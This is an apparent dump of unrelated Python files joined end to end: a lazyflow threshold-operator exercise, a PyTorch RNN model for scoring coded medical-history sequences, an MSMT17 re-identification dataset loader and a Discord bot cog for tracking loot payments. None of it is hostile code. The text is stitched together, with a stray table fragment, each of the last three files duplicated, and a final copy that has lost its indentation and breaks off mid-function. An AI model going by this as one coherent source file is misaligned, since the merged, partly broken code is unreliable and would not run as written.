        """Fill ``result`` with thresholded upstream data for ``roi``.

        Called whenever an OutputSlot of this operator is queried (unless
        that slot is connected to another slot).

        Parameters:
            slot      OutputSlot the data was requested from; only
                      self.Output exists here, so it is ignored.
            subindex  used for higher-level slots; ignored here.
            roi       requested region (lazyflow.rtype.SubRegion); passed
                      straight to Slot.get() to request upstream data.
            result    preallocated numpy array shaped like ``roi``; filled
                      in place — nothing is (or should be) returned.
        """
        threshold = self._threshold
        # Slot.get(roi) builds a request for exactly the requested region,
        # avoiding manual slicing extraction from the roi object.
        upstream_data = self.Input.get(roi).wait()
        assert upstream_data.shape == result.shape
        # Fill result in place (result[:] = ..., never rebind result);
        # numpy casts the boolean mask to result's dtype, yielding 0/1.
        result[:] = upstream_data >= threshold
"""
Ok, ready to test your implementation?
"""
import numpy
from lazyflow.graph import Graph
input_array = numpy.asarray([[.20, .60, .30],
[.10, .55, .99]])
expected_output_array = numpy.asarray([[0.0, 1.0, 0.0],
[0.0, 1.0, 1.0]])
op = OpThreshold(graph=Graph())
op.Input.setValue(input_array)
"""
Test whether requesting the whole array works ...
"""
output_array = op.Output[...].wait()
numpy.testing.assert_array_equal(output_array, expected_output_array)
"""
Test whether requesting a slice works ... Why do we need the squeeze()?
Hint: see last exercise.
"""
output_slice = op.Output[0, :].wait().squeeze()
expected_output_slice = expected_output_array[0, :]
numpy.testing.assert_array_equal(output_slice, expected_output_slice)
"""
That was not too hard. However, we used a fair amount of existent code,
which limits us in some ways.
"""
assert output_array.dtype == input_array.dtype
"""
Wouldn't it be nice if the output was a bool array rather than float64?
We will accomplish that in the next exercise.
""" | 0.761095 | 0.754712 |
import numpy as np
import math
import pandas as pd
import pickle as pkl
import torch
import torch.utils.data as utils
import torch.nn.functional as F
import torch.nn as nn
from torch.nn import LSTM, GRU, ConstantPad1d
from tqdm import tqdm
from attention_models import Attention
from pdb import set_trace as bp
def flip_batch(x, seq_length):
    """Reverse, IN PLACE, the first ``seq_length[i]`` steps of row ``i`` of ``x``.

    Padding positions beyond each row's length are left untouched.
    Returns ``x`` itself for convenience.
    """
    batch_size = x.shape[0]
    assert batch_size == seq_length.shape[0], 'Dimension Mismatch!'
    for row, length in enumerate(seq_length):
        x[row, :length] = x[row, :length].flip(dims=[0])
    return x
class NetRNN(nn.Module):
    """Two unidirectional RNNs over padded sequences of code embeddings.

    A "forward" RNN reads the sequence as given and a "backward" RNN reads
    a per-row reversed copy (via flip_batch).  Both sequence summaries are
    concatenated with the static covariates ``x`` and fed to an MLP that
    emits one score per row.  ``hp`` is a hyperparameter object; the
    attributes read in __init__ select the behaviour.

    BUGFIX: in forward(), when ``add_month != 'concat'`` the backward copy
    is now flipped on a ``.clone()``.  Previously flip_batch mutated
    ``embedded`` in place while ``embedded_fw`` aliased the same tensor,
    so BOTH RNNs received the reversed sequence.
    """
    def __init__(self, num_input, num_embeddings, hp):
        super().__init__()
        # Parameters ######################################################
        self.nonprop_hazards = hp.nonprop_hazards
        self.add_diagt = hp.add_diagt
        self.add_month = hp.add_month        # 'embedding', 'concat', or other
        self.num_months_hx = hp.num_months_hx-1
        self.rnn_type = hp.rnn_type          # 'LSTM' or 'GRU'
        self.num_rnn_layers = hp.num_rnn_layers
        self.embedding_dim = hp.embedding_dim
        self.summarize = hp.summarize
        # Embedding layers (index 0 reserved for padding in every table) ##
        self.embed_codes = nn.Embedding(num_embeddings = num_embeddings, embedding_dim = hp.embedding_dim, padding_idx = 0)
        if self.add_month == 'embedding':
            self.embed_month = nn.Embedding(num_embeddings = hp.num_months_hx, embedding_dim = hp.embedding_dim, padding_idx = 0)
        if self.add_diagt:
            self.embed_diagt = nn.Embedding(num_embeddings = 5, embedding_dim = hp.embedding_dim, padding_idx = 0)
        # RNN #############################################################
        if self.add_month == 'concat':
            # one extra input channel for the month delta concatenated in forward()
            self.embedding_dim = self.embedding_dim + 1
            self.pad_fw = ConstantPad1d((1, 0), 0.)
            self.pad_bw = ConstantPad1d((0, 1), 0.)
        if self.rnn_type == 'LSTM':
            self.rnn_fw = LSTM(input_size = self.embedding_dim, hidden_size = self.embedding_dim, num_layers = self.num_rnn_layers, batch_first = True, dropout = hp.dropout, bidirectional = False)
            self.rnn_bw = LSTM(input_size = self.embedding_dim, hidden_size = self.embedding_dim, num_layers = self.num_rnn_layers, batch_first = True, dropout = hp.dropout, bidirectional = False)
        else:
            self.rnn_fw = GRU(input_size = self.embedding_dim, hidden_size = self.embedding_dim, num_layers = self.num_rnn_layers, batch_first = True, dropout = hp.dropout, bidirectional = False)
            self.rnn_bw = GRU(input_size = self.embedding_dim, hidden_size = self.embedding_dim, num_layers = self.num_rnn_layers, batch_first = True, dropout = hp.dropout, bidirectional = False)
        if self.summarize == 'output_attention':
            self.attention_fw = Attention(embedding_dim = self.embedding_dim)
            self.attention_bw = Attention(embedding_dim = self.embedding_dim)
        # Fully connected layers ##########################################
        fc_size = num_input + 2*self.embedding_dim
        layers = []
        for i in range(hp.num_mlp_layers):
            layers.append(nn.Linear(fc_size, fc_size))
            layers.append(nn.ELU())
        layers.append(nn.Linear(fc_size, 1))
        self.mlp = nn.Sequential(*layers)

    def forward(self, x, code, month, diagt, time=None, seq_length=None):
        """Score each row; ``code``/``month``/``diagt`` are padded (batch, seq) tensors.

        NOTE(review): assumes code 0 marks padding (lengths are inferred by
        counting positive codes) — confirm against the data pipeline.
        """
        if self.nonprop_hazards and (time is not None):
            x = torch.cat((x, time), dim=-1)
        if seq_length is None:
            seq_length = (code>0).sum(dim=-1)
        # Embedding layers ################################################
        embedded = self.embed_codes(code.long())
        if self.add_diagt:
            embedded = embedded + self.embed_diagt(diagt.long())
        if self.add_month == 'embedding':
            embedded = embedded + self.embed_month(month.long())
        if self.add_month == 'concat':
            month = month/float(self.num_months_hx)
            # non-negative gaps between consecutive months, padded so the
            # delta aligns with the step it precedes (fw) or follows (bw)
            delta = torch.clamp(month[:,1:]-month[:,:-1], min=0)
            delta_fw = self.pad_fw(delta)
            delta_bw = self.pad_bw(delta)
            embedded_fw = torch.cat((embedded, delta_fw.unsqueeze(dim=-1)), dim=-1)
            embedded_bw = torch.cat((embedded, delta_bw.unsqueeze(dim=-1)), dim=-1)
            embedded_bw = flip_batch(embedded_bw, seq_length)
        else:
            embedded_fw = embedded
            # flip a clone: flip_batch works in place and would otherwise
            # also reverse embedded_fw (it aliases `embedded`)
            embedded_bw = flip_batch(embedded.clone(), seq_length)
        # RNN #############################################################
        packed_fw = nn.utils.rnn.pack_padded_sequence(embedded_fw, seq_length.clamp(min=1), batch_first = True, enforce_sorted = False)
        packed_bw = nn.utils.rnn.pack_padded_sequence(embedded_bw, seq_length.clamp(min=1), batch_first = True, enforce_sorted = False)
        if self.rnn_type == 'LSTM':
            output_fw, (hidden_fw, _) = self.rnn_fw(packed_fw)
            output_bw, (hidden_bw, _) = self.rnn_bw(packed_bw)
        elif self.rnn_type == 'GRU':
            output_fw, hidden_fw = self.rnn_fw(packed_fw)
            output_bw, hidden_bw = self.rnn_bw(packed_bw)
        if self.summarize == 'hidden':
            hidden_fw = hidden_fw[-1] # view(num_layers, num_directions=1, batch, hidden_size)[last_state]
            hidden_bw = hidden_bw[-1] # view(num_layers, num_directions=1, batch, hidden_size)[last_state]
            summary_0, summary_1 = hidden_fw, hidden_bw
        else:
            output_fw, _ = nn.utils.rnn.pad_packed_sequence(output_fw, batch_first=True)
            output_bw, _ = nn.utils.rnn.pad_packed_sequence(output_bw, batch_first=True)
            output_fw = output_fw.view(-1, max(1, seq_length.max()), self.embedding_dim) # view(batch, seq_len, num_directions=1, hidden_size)
            output_bw = output_bw.view(-1, max(1, seq_length.max()), self.embedding_dim) # view(batch, seq_len, num_directions=1, hidden_size)
            if self.summarize == 'output_max':
                output_fw, _ = output_fw.max(dim=1)
                output_bw, _ = output_bw.max(dim=1)
                summary_0, summary_1 = output_fw, output_bw
            elif self.summarize == 'output_sum':
                output_fw = output_fw.sum(dim=1)
                output_bw = output_bw.sum(dim=1)
                summary_0, summary_1 = output_fw, output_bw
            elif self.summarize == 'output_avg':
                output_fw = output_fw.sum(dim=1)/(seq_length.clamp(min=1).view(-1, 1))
                output_bw = output_bw.sum(dim=1)/(seq_length.clamp(min=1).view(-1, 1))
                summary_0, summary_1 = output_fw, output_bw
            elif self.summarize == 'output_attention':
                mask = (code>0)[:, :max(1, seq_length.max())]
                summary_0, _ = self.attention_fw(output_fw, mask)
                summary_1, _ = self.attention_bw(output_bw, mask)
        # Fully connected layers ##########################################
        x = torch.cat((x, summary_0, summary_1), dim=-1)
        x = self.mlp(x)
        return x
class NetRNNFinal(nn.Module):
    """Streamlined, forward-only variant of NetRNN.

    Fixed configuration: code + diagnosis-type embeddings, month deltas
    concatenated as one extra channel, a forward GRU, attention pooling,
    and a 2-layer MLP head producing one score per row.
    """
    def __init__(self, num_input, num_embeddings, hp):
        super().__init__()
        # Parameters ######################################################
        self.num_months_hx = hp.num_months_hx-1
        self.num_rnn_layers = hp.num_rnn_layers
        self.embedding_dim = hp.embedding_dim
        # Embedding layers (index 0 reserved for padding) #################
        self.embed_codes = nn.Embedding(num_embeddings = num_embeddings, embedding_dim = hp.embedding_dim, padding_idx = 0)
        self.embed_diagt = nn.Embedding(num_embeddings = 5, embedding_dim = hp.embedding_dim, padding_idx = 0)
        # RNN: +1 input channel for the month delta concatenated in forward()
        self.embedding_dim = self.embedding_dim + 1
        self.pad_fw = ConstantPad1d((1, 0), 0.)
        self.rnn_fw = GRU(input_size = self.embedding_dim, hidden_size = self.embedding_dim, num_layers = self.num_rnn_layers, batch_first = True, dropout = hp.dropout, bidirectional = False)
        self.attention_fw = Attention(embedding_dim = self.embedding_dim)
        # Fully connected layers ##########################################
        fc_size = num_input + self.embedding_dim
        layers = []
        layers.append(nn.Linear(fc_size, fc_size))
        layers.append(nn.ELU())
        layers.append(nn.Linear(fc_size, 1))
        self.mlp = nn.Sequential(*layers)
    def forward(self, x, code, month, diagt, time=None, seq_length=None):
        """Score each row; ``time`` is accepted for interface parity but unused.

        NOTE(review): assumes code 0 marks padding (lengths inferred by
        counting positive codes) — confirm against the data pipeline.
        """
        if seq_length is None:
            seq_length = (code>0).sum(dim=-1)
        # Embedding layers ################################################
        embedded = self.embed_codes(code.long())
        embedded = embedded + self.embed_diagt(diagt.long())
        # Normalized, non-negative gaps between consecutive months, left-padded
        # with 0 so each delta aligns with the step it precedes.
        month = month/float(self.num_months_hx)
        delta = torch.clamp(month[:,1:]-month[:,:-1], min=0)
        delta_fw = self.pad_fw(delta)
        embedded_fw = torch.cat((embedded, delta_fw.unsqueeze(dim=-1)), dim=-1)
        # RNN: pack (clamping empty rows to length 1), run, and unpack ####
        packed_fw = nn.utils.rnn.pack_padded_sequence(embedded_fw, seq_length.clamp(min=1), batch_first = True, enforce_sorted = False)
        output_fw, _ = self.rnn_fw(packed_fw)
        output_fw, _ = nn.utils.rnn.pad_packed_sequence(output_fw, batch_first=True)
        output_fw = output_fw.view(-1, max(1, seq_length.max()), self.embedding_dim) # view(batch, seq_len, num_directions=1, hidden_size)
        # Attention pooling over valid (non-padding) steps only.
        mask = (code>0)[:, :max(1, seq_length.max())]
        summary_0, _ = self.attention_fw(output_fw, mask)
        # Fully connected layers ##########################################
        x = torch.cat((x, summary_0), dim=-1)
        x = self.mlp(x)
        return x
import math
import pandas as pd
import pickle as pkl
import torch
import torch.utils.data as utils
import torch.nn.functional as F
import torch.nn as nn
from torch.nn import LSTM, GRU, ConstantPad1d
from tqdm import tqdm
from attention_models import Attention
from pdb import set_trace as bp
def flip_batch(x, seq_length):
    """Reverse, IN PLACE, the first ``seq_length[i]`` steps of row ``i`` of ``x``.

    Padding positions beyond each row's length are left untouched.
    Returns ``x`` itself for convenience.
    """
    batch_size = x.shape[0]
    assert batch_size == seq_length.shape[0], 'Dimension Mismatch!'
    for row, length in enumerate(seq_length):
        x[row, :length] = x[row, :length].flip(dims=[0])
    return x
class NetRNN(nn.Module):
    """Two unidirectional RNNs over padded sequences of code embeddings.

    A "forward" RNN reads the sequence as given and a "backward" RNN reads
    a per-row reversed copy (via flip_batch).  Both sequence summaries are
    concatenated with the static covariates ``x`` and fed to an MLP that
    emits one score per row.  ``hp`` is a hyperparameter object; the
    attributes read in __init__ select the behaviour.

    BUGFIX: in forward(), when ``add_month != 'concat'`` the backward copy
    is now flipped on a ``.clone()``.  Previously flip_batch mutated
    ``embedded`` in place while ``embedded_fw`` aliased the same tensor,
    so BOTH RNNs received the reversed sequence.
    """
    def __init__(self, num_input, num_embeddings, hp):
        super().__init__()
        # Parameters ######################################################
        self.nonprop_hazards = hp.nonprop_hazards
        self.add_diagt = hp.add_diagt
        self.add_month = hp.add_month        # 'embedding', 'concat', or other
        self.num_months_hx = hp.num_months_hx-1
        self.rnn_type = hp.rnn_type          # 'LSTM' or 'GRU'
        self.num_rnn_layers = hp.num_rnn_layers
        self.embedding_dim = hp.embedding_dim
        self.summarize = hp.summarize
        # Embedding layers (index 0 reserved for padding in every table) ##
        self.embed_codes = nn.Embedding(num_embeddings = num_embeddings, embedding_dim = hp.embedding_dim, padding_idx = 0)
        if self.add_month == 'embedding':
            self.embed_month = nn.Embedding(num_embeddings = hp.num_months_hx, embedding_dim = hp.embedding_dim, padding_idx = 0)
        if self.add_diagt:
            self.embed_diagt = nn.Embedding(num_embeddings = 5, embedding_dim = hp.embedding_dim, padding_idx = 0)
        # RNN #############################################################
        if self.add_month == 'concat':
            # one extra input channel for the month delta concatenated in forward()
            self.embedding_dim = self.embedding_dim + 1
            self.pad_fw = ConstantPad1d((1, 0), 0.)
            self.pad_bw = ConstantPad1d((0, 1), 0.)
        if self.rnn_type == 'LSTM':
            self.rnn_fw = LSTM(input_size = self.embedding_dim, hidden_size = self.embedding_dim, num_layers = self.num_rnn_layers, batch_first = True, dropout = hp.dropout, bidirectional = False)
            self.rnn_bw = LSTM(input_size = self.embedding_dim, hidden_size = self.embedding_dim, num_layers = self.num_rnn_layers, batch_first = True, dropout = hp.dropout, bidirectional = False)
        else:
            self.rnn_fw = GRU(input_size = self.embedding_dim, hidden_size = self.embedding_dim, num_layers = self.num_rnn_layers, batch_first = True, dropout = hp.dropout, bidirectional = False)
            self.rnn_bw = GRU(input_size = self.embedding_dim, hidden_size = self.embedding_dim, num_layers = self.num_rnn_layers, batch_first = True, dropout = hp.dropout, bidirectional = False)
        if self.summarize == 'output_attention':
            self.attention_fw = Attention(embedding_dim = self.embedding_dim)
            self.attention_bw = Attention(embedding_dim = self.embedding_dim)
        # Fully connected layers ##########################################
        fc_size = num_input + 2*self.embedding_dim
        layers = []
        for i in range(hp.num_mlp_layers):
            layers.append(nn.Linear(fc_size, fc_size))
            layers.append(nn.ELU())
        layers.append(nn.Linear(fc_size, 1))
        self.mlp = nn.Sequential(*layers)

    def forward(self, x, code, month, diagt, time=None, seq_length=None):
        """Score each row; ``code``/``month``/``diagt`` are padded (batch, seq) tensors.

        NOTE(review): assumes code 0 marks padding (lengths are inferred by
        counting positive codes) — confirm against the data pipeline.
        """
        if self.nonprop_hazards and (time is not None):
            x = torch.cat((x, time), dim=-1)
        if seq_length is None:
            seq_length = (code>0).sum(dim=-1)
        # Embedding layers ################################################
        embedded = self.embed_codes(code.long())
        if self.add_diagt:
            embedded = embedded + self.embed_diagt(diagt.long())
        if self.add_month == 'embedding':
            embedded = embedded + self.embed_month(month.long())
        if self.add_month == 'concat':
            month = month/float(self.num_months_hx)
            # non-negative gaps between consecutive months, padded so the
            # delta aligns with the step it precedes (fw) or follows (bw)
            delta = torch.clamp(month[:,1:]-month[:,:-1], min=0)
            delta_fw = self.pad_fw(delta)
            delta_bw = self.pad_bw(delta)
            embedded_fw = torch.cat((embedded, delta_fw.unsqueeze(dim=-1)), dim=-1)
            embedded_bw = torch.cat((embedded, delta_bw.unsqueeze(dim=-1)), dim=-1)
            embedded_bw = flip_batch(embedded_bw, seq_length)
        else:
            embedded_fw = embedded
            # flip a clone: flip_batch works in place and would otherwise
            # also reverse embedded_fw (it aliases `embedded`)
            embedded_bw = flip_batch(embedded.clone(), seq_length)
        # RNN #############################################################
        packed_fw = nn.utils.rnn.pack_padded_sequence(embedded_fw, seq_length.clamp(min=1), batch_first = True, enforce_sorted = False)
        packed_bw = nn.utils.rnn.pack_padded_sequence(embedded_bw, seq_length.clamp(min=1), batch_first = True, enforce_sorted = False)
        if self.rnn_type == 'LSTM':
            output_fw, (hidden_fw, _) = self.rnn_fw(packed_fw)
            output_bw, (hidden_bw, _) = self.rnn_bw(packed_bw)
        elif self.rnn_type == 'GRU':
            output_fw, hidden_fw = self.rnn_fw(packed_fw)
            output_bw, hidden_bw = self.rnn_bw(packed_bw)
        if self.summarize == 'hidden':
            hidden_fw = hidden_fw[-1] # view(num_layers, num_directions=1, batch, hidden_size)[last_state]
            hidden_bw = hidden_bw[-1] # view(num_layers, num_directions=1, batch, hidden_size)[last_state]
            summary_0, summary_1 = hidden_fw, hidden_bw
        else:
            output_fw, _ = nn.utils.rnn.pad_packed_sequence(output_fw, batch_first=True)
            output_bw, _ = nn.utils.rnn.pad_packed_sequence(output_bw, batch_first=True)
            output_fw = output_fw.view(-1, max(1, seq_length.max()), self.embedding_dim) # view(batch, seq_len, num_directions=1, hidden_size)
            output_bw = output_bw.view(-1, max(1, seq_length.max()), self.embedding_dim) # view(batch, seq_len, num_directions=1, hidden_size)
            if self.summarize == 'output_max':
                output_fw, _ = output_fw.max(dim=1)
                output_bw, _ = output_bw.max(dim=1)
                summary_0, summary_1 = output_fw, output_bw
            elif self.summarize == 'output_sum':
                output_fw = output_fw.sum(dim=1)
                output_bw = output_bw.sum(dim=1)
                summary_0, summary_1 = output_fw, output_bw
            elif self.summarize == 'output_avg':
                output_fw = output_fw.sum(dim=1)/(seq_length.clamp(min=1).view(-1, 1))
                output_bw = output_bw.sum(dim=1)/(seq_length.clamp(min=1).view(-1, 1))
                summary_0, summary_1 = output_fw, output_bw
            elif self.summarize == 'output_attention':
                mask = (code>0)[:, :max(1, seq_length.max())]
                summary_0, _ = self.attention_fw(output_fw, mask)
                summary_1, _ = self.attention_bw(output_bw, mask)
        # Fully connected layers ##########################################
        x = torch.cat((x, summary_0, summary_1), dim=-1)
        x = self.mlp(x)
        return x
class NetRNNFinal(nn.Module):
    """Streamlined, forward-only variant of NetRNN.

    Fixed configuration: code + diagnosis-type embeddings, month deltas
    concatenated as one extra channel, a forward GRU, attention pooling,
    and a 2-layer MLP head producing one score per row.
    """
    def __init__(self, num_input, num_embeddings, hp):
        super().__init__()
        # Parameters ######################################################
        self.num_months_hx = hp.num_months_hx-1
        self.num_rnn_layers = hp.num_rnn_layers
        self.embedding_dim = hp.embedding_dim
        # Embedding layers (index 0 reserved for padding) #################
        self.embed_codes = nn.Embedding(num_embeddings = num_embeddings, embedding_dim = hp.embedding_dim, padding_idx = 0)
        self.embed_diagt = nn.Embedding(num_embeddings = 5, embedding_dim = hp.embedding_dim, padding_idx = 0)
        # RNN: +1 input channel for the month delta concatenated in forward()
        self.embedding_dim = self.embedding_dim + 1
        self.pad_fw = ConstantPad1d((1, 0), 0.)
        self.rnn_fw = GRU(input_size = self.embedding_dim, hidden_size = self.embedding_dim, num_layers = self.num_rnn_layers, batch_first = True, dropout = hp.dropout, bidirectional = False)
        self.attention_fw = Attention(embedding_dim = self.embedding_dim)
        # Fully connected layers ##########################################
        fc_size = num_input + self.embedding_dim
        layers = []
        layers.append(nn.Linear(fc_size, fc_size))
        layers.append(nn.ELU())
        layers.append(nn.Linear(fc_size, 1))
        self.mlp = nn.Sequential(*layers)
    def forward(self, x, code, month, diagt, time=None, seq_length=None):
        """Score each row; ``time`` is accepted for interface parity but unused.

        NOTE(review): assumes code 0 marks padding (lengths inferred by
        counting positive codes) — confirm against the data pipeline.
        """
        if seq_length is None:
            seq_length = (code>0).sum(dim=-1)
        # Embedding layers ################################################
        embedded = self.embed_codes(code.long())
        embedded = embedded + self.embed_diagt(diagt.long())
        # Normalized, non-negative gaps between consecutive months, left-padded
        # with 0 so each delta aligns with the step it precedes.
        month = month/float(self.num_months_hx)
        delta = torch.clamp(month[:,1:]-month[:,:-1], min=0)
        delta_fw = self.pad_fw(delta)
        embedded_fw = torch.cat((embedded, delta_fw.unsqueeze(dim=-1)), dim=-1)
        # RNN: pack (clamping empty rows to length 1), run, and unpack ####
        packed_fw = nn.utils.rnn.pack_padded_sequence(embedded_fw, seq_length.clamp(min=1), batch_first = True, enforce_sorted = False)
        output_fw, _ = self.rnn_fw(packed_fw)
        output_fw, _ = nn.utils.rnn.pad_packed_sequence(output_fw, batch_first=True)
        output_fw = output_fw.view(-1, max(1, seq_length.max()), self.embedding_dim) # view(batch, seq_len, num_directions=1, hidden_size)
        # Attention pooling over valid (non-padding) steps only.
        mask = (code>0)[:, :max(1, seq_length.max())]
        summary_0, _ = self.attention_fw(output_fw, mask)
        # Fully connected layers ##########################################
        x = torch.cat((x, summary_0), dim=-1)
        x = self.mlp(x)
        return x
from __future__ import division, print_function, absolute_import
import re
import glob
import os.path as osp
import warnings
from ..dataset import ImageDataset
class MSMT17_NEW(ImageDataset):
    """MSMT17 (Market-1501-style directory layout).

    Reference:
        Wei et al. Person Transfer GAN to Bridge Domain Gap for Person
        Re-Identification. CVPR 2018.
    URL: `<http://www.pkuvmc.com/publications/msmt17.html>`_

    Dataset statistics:
        - identities: 4101.
        - images: 32621 (train) + 11659 (query) + 82161 (gallery).
        - cameras: 15.
    """
    _junk_pids = [0, -1]
    dataset_dir = 'MSMT17'
    dataset_url = None

    def __init__(self, root='', **kwargs):
        self.root = osp.abspath(osp.expanduser(root))
        self.dataset_dir = osp.join(self.root, self.dataset_dir)
        self.download_dataset(self.dataset_dir, self.dataset_url)
        # Splits live directly under the dataset directory.
        self.data_dir = self.dataset_dir
        self.train_dir = osp.join(self.data_dir, 'bounding_box_train')
        self.query_dir = osp.join(self.data_dir, 'query')
        self.gallery_dir = osp.join(self.data_dir, 'bounding_box_test')
        # NOTE(review): assembled but never validated (e.g. via a
        # check_before_run call) — confirm whether a check was intended here.
        required_files = [
            self.data_dir, self.train_dir, self.query_dir, self.gallery_dir
        ]
        train = self.process_dir(self.train_dir, relabel=True)
        query = self.process_dir(self.query_dir, relabel=False)
        gallery = self.process_dir(self.gallery_dir, relabel=False)
        super(MSMT17_NEW, self).__init__(train, query, gallery, **kwargs)

    def process_dir(self, dir_path, relabel=False):
        """Collect (image_path, pid, camid) triples from one split directory."""
        image_paths = glob.glob(osp.join(dir_path, '*.jpg'))
        name_pattern = re.compile(r'([-\d]+)_c(\d+)')

        # First pass: gather the person ids present (pid -1 marks junk).
        pid_set = set()
        for path in image_paths:
            pid, _ = map(int, name_pattern.search(path).groups())
            if pid == -1:
                continue  # junk images are just ignored
            pid_set.add(pid)
        pid2label = {pid: label for label, pid in enumerate(pid_set)}

        # Second pass: emit records, optionally relabelling pids to 0..N-1.
        records = []
        for path in image_paths:
            pid, camid = map(int, name_pattern.search(path).groups())
            if pid == -1:
                continue  # junk images are just ignored
            assert 0 <= pid <= 3059  # pid == 0 means background
            assert 1 <= camid <= 15
            camid -= 1  # index starts from 0
            if relabel:
                pid = pid2label[pid]
            records.append((path, pid, camid))
        return records
import re
import glob
import os.path as osp
import warnings
from ..dataset import ImageDataset
class MSMT17_NEW(ImageDataset):
    """MSMT17 (Market-1501-style directory layout).

    Reference:
        Wei et al. Person Transfer GAN to Bridge Domain Gap for Person
        Re-Identification. CVPR 2018.
    URL: `<http://www.pkuvmc.com/publications/msmt17.html>`_

    Dataset statistics:
        - identities: 4101.
        - images: 32621 (train) + 11659 (query) + 82161 (gallery).
        - cameras: 15.
    """
    _junk_pids = [0, -1]
    dataset_dir = 'MSMT17'
    dataset_url = None

    def __init__(self, root='', **kwargs):
        self.root = osp.abspath(osp.expanduser(root))
        self.dataset_dir = osp.join(self.root, self.dataset_dir)
        self.download_dataset(self.dataset_dir, self.dataset_url)
        # Splits live directly under the dataset directory.
        self.data_dir = self.dataset_dir
        self.train_dir = osp.join(self.data_dir, 'bounding_box_train')
        self.query_dir = osp.join(self.data_dir, 'query')
        self.gallery_dir = osp.join(self.data_dir, 'bounding_box_test')
        # NOTE(review): assembled but never validated (e.g. via a
        # check_before_run call) — confirm whether a check was intended here.
        required_files = [
            self.data_dir, self.train_dir, self.query_dir, self.gallery_dir
        ]
        train = self.process_dir(self.train_dir, relabel=True)
        query = self.process_dir(self.query_dir, relabel=False)
        gallery = self.process_dir(self.gallery_dir, relabel=False)
        super(MSMT17_NEW, self).__init__(train, query, gallery, **kwargs)

    def process_dir(self, dir_path, relabel=False):
        """Collect (image_path, pid, camid) triples from one split directory."""
        image_paths = glob.glob(osp.join(dir_path, '*.jpg'))
        name_pattern = re.compile(r'([-\d]+)_c(\d+)')

        # First pass: gather the person ids present (pid -1 marks junk).
        pid_set = set()
        for path in image_paths:
            pid, _ = map(int, name_pattern.search(path).groups())
            if pid == -1:
                continue  # junk images are just ignored
            pid_set.add(pid)
        pid2label = {pid: label for label, pid in enumerate(pid_set)}

        # Second pass: emit records, optionally relabelling pids to 0..N-1.
        records = []
        for path in image_paths:
            pid, camid = map(int, name_pattern.search(path).groups())
            if pid == -1:
                continue  # junk images are just ignored
            assert 0 <= pid <= 3059  # pid == 0 means background
            assert 1 <= camid <= 15
            camid -= 1  # index starts from 0
            if relabel:
                pid = pid2label[pid]
            records.append((path, pid, camid))
        return records
import discord
from redbot.core import Config, commands
from redbot.core.bot import Red
BaseCog = getattr(commands, "Cog", object)
class Loot(BaseCog):
    """Track who paid how much for shared loot items, per guild.

    Items are stored as top-level keys in the guild config; each item maps
    character names to the amount they paid.

    BUGFIX: ``remove`` previously reported "<char> has been removed" (and
    re-saved the config) even when that character had no entry under the
    item; it now reports the miss explicitly and leaves the data untouched.
    """
    # No guild-level defaults yet; items are created on demand.
    default_guild_settings = {}

    def __init__(self, bot: Red):
        self.bot = bot
        # 9741981201 is this cog's unique Config identifier.
        self._loot = Config.get_conf(self, 9741981201)
        self._loot.register_guild(**self.default_guild_settings)

    @commands.group(pass_context=True)
    async def loot(self, ctx):
        """Loot related commands"""
        if ctx.invoked_subcommand is None:
            await ctx.send_help()

    @loot.command(pass_context=True)
    async def add(self, ctx, name: str, char: str, price: int):
        """Adds players and amounts paid to an item"""
        name = name.lower()
        guild = ctx.guild
        loot = await self._loot.guild(guild).all()
        if name not in loot:
            await ctx.send("item doesn't exist, please use [p]loot create first")
            return
        loot[name][char] = price
        await ctx.send("{} paid {} for {}".format(char, price, name))
        await self._loot.guild(guild).set(loot)

    @loot.command(pass_context=True)
    async def create(self, ctx, name: str):
        """Creates an item in the current guild."""
        name = name.lower()
        guild = ctx.guild
        loot = await self._loot.guild(guild).all()
        if name in loot:
            await ctx.send("Item already exists, use another name.")
            return
        loot[name] = {}
        await ctx.send("{} has been added.".format(name))
        await self._loot.guild(guild).set(loot)

    @loot.command(pass_context=True)
    async def info(self, ctx, name: str):
        """Shows who has invested in the item"""
        name = name.lower()
        guild = ctx.guild
        loot = await self._loot.guild(guild).all()
        if name not in loot:
            await ctx.send(
                "Please make sure that the name is spelled correctly and "
                "that you can find it in [p]loot list"
            )
            return
        # NOTE(review): an item with no investors yields empty embed field
        # values, which Discord rejects — consider guarding this case.
        players = "\n".join(list(loot[name].keys()))
        gold = "\n".join(str(x) for x in list(loot[name].values()))
        embed = discord.Embed(color=6465603)
        embed.set_author(name=name)
        embed.add_field(name="__Players__", value=players)
        embed.add_field(name="__Price Paid__", value=gold)
        await ctx.send(embed=embed)

    @loot.command(pass_context=True)
    async def list(self, ctx):
        """Shows existing loot in the current guild"""
        guild = ctx.guild
        loot = await self._loot.guild(guild).all()
        if len(loot) < 1:
            await ctx.send(
                "No items have been created for this guild yet, please create some using [p]item create"
                " first, thanks"
            )
            return
        items = loot.keys()
        await ctx.send("Here are this guild's items:\n{}".format("\n".join(items)))

    @loot.command(pass_context=True, hidden=True)
    async def remove(self, ctx, name: str, char: str = None):
        """Deletes existing characters in an item or items"""
        name = name.lower()
        guild = ctx.guild
        loot = await self._loot.guild(guild).all()
        if name not in loot:
            await ctx.send(
                "Please make sure that the name is spelled correctly and "
                "that you can find it in [p]loot list"
            )
            return
        if char is None:
            # No character given: drop the whole item.
            del loot[name]
        elif char in loot[name]:
            del loot[name][char]
        else:
            # Character has no entry under this item — report instead of
            # claiming a removal happened.
            await ctx.send("{} has not invested in {}".format(char, name))
            return
        await ctx.send("{} has been removed".format(char if char else name))
        await self._loot.guild(guild).set(loot)
from redbot.core import Config, commands
from redbot.core.bot import Red
BaseCog = getattr(commands, "Cog", object)
class Loot(BaseCog):
default_guild_settings = {}
def __init__(self, bot: Red):
self.bot = bot
self._loot = Config.get_conf(self, 9741981201)
self._loot.register_guild(**self.default_guild_settings)
@commands.group(pass_context=True)
async def loot(self, ctx):
"""Loot related commands"""
if ctx.invoked_subcommand is None:
await ctx.send_help()
@loot.command(pass_context=True)
async def add(self, ctx, name: str, char: str, price: int):
"""Adds players and amounts paid to an item"""
name = name.lower()
guild = ctx.guild
loot = await self._loot.guild(guild).all()
if name not in loot:
await ctx.send("item doesn't exist, please use [p]loot create first")
return
loot[name][char] = price
await ctx.send("{} paid {} for {}".format(char, price, name))
await self._loot.guild(guild).set(loot)
@loot.command(pass_context=True)
async def create(self, ctx, name: str):
"""Creates an item in the current guild."""
name = name.lower()
guild = ctx.guild
loot = await self._loot.guild(guild).all()
if name in loot.keys():
await ctx.send("Item already exists, use another name.")
return
loot[name] = {}
await ctx.send("{} has been added.".format(name))
await self._loot.guild(guild).set(loot)
@loot.command(pass_context=True)
async def info(self, ctx, name: str):
"""Shows who has invested in the item"""
name = name.lower()
guild = ctx.guild
